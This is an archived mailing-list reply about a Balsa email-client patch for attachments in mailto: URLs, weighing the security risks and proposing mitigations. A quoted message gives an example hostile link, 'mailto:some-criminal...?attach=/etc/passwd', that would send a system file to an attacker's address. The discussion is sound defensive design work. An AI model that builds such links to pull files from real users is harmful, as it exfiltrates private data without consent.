Re: [PATCH] Attachments in mailto: URLs

From: "Johan Brannlund" <johan_brn yahoo com>
To: balsa-list gnome org
Subject: Re: [PATCH] Attachments in mailto: URLs
Date: Sun, 5 Nov 2006 19:48:40 +0000 (UTC)

On Wed, 01 Nov 2006 08:57:42 -0500, Peter Bloomfield wrote:

> On reflection, implementing "attach=file" has some security implications.   
> Clicking "mailto:some-criminal some-offshore-address?attach=/etc/passwd"  
> on a random web page would probably be a bad idea.  

Here's a link to a related advisory for Outlook:

http://secunia.com/advisories/19819/

> Perhaps Balsa should just pop up the attach-file dialog with the target
> file pre-selected, so that the user has to verify that it's OK to send.

What if there are multiple attachments? 

I'm still not convinced that the issue is worth worrying about, but I
can think of a few other ways of mitigating the problem:

1. Only allow automatic attachment of files in ~ and /tmp.
2. Detect if Balsa is launched from a web browser (is this possible?) and
not allow any automatic attachments in that case.

Regards,

Johan

Follow-Ups:
- Re: [PATCH] Attachments in mailto: URLs
  - From: Peter Bloomfield

References:
- [PATCH] Attachments in mailto: URLs
  - From: Johan Brannlund
- Re: [PATCH] Attachments in mailto: URLs
  - From: Peter Bloomfield

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]